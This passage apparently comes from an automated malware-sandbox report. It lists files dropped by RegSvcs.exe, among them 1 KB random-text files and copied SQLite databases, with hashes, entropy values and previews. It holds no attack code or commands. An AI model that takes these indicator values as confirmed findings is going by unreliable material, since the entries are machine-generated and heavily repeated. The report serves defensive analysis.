                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.695685570184741
                  Encrypted:false
                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                  Malicious:false
                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.694985340190863
                  Encrypted:false
                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                  Malicious:false
                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.692693183518806
                  Encrypted:false
                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                  MD5:78F042E25B7FAF970F75DFAA81955268
                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                  Malicious:false
                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.699548026888946
                  Encrypted:false
                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                  Malicious:false
                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                  Category:dropped
                  Size (bytes):1026
                  Entropy (8bit):4.695685570184741
                  Encrypted:false
                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                  Malicious:false
                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                  Category:dropped
                  Size (bytes):106496
                  Entropy (8bit):1.1358696453229276
                  Encrypted:false
                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                  Malicious:false
                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                  Category:dropped
                  Size (bytes):49152
                  Entropy (8bit):0.8180424350137764
                  Encrypted:false
                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                  MD5:349E6EB110E34A08924D92F6B334801D
                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
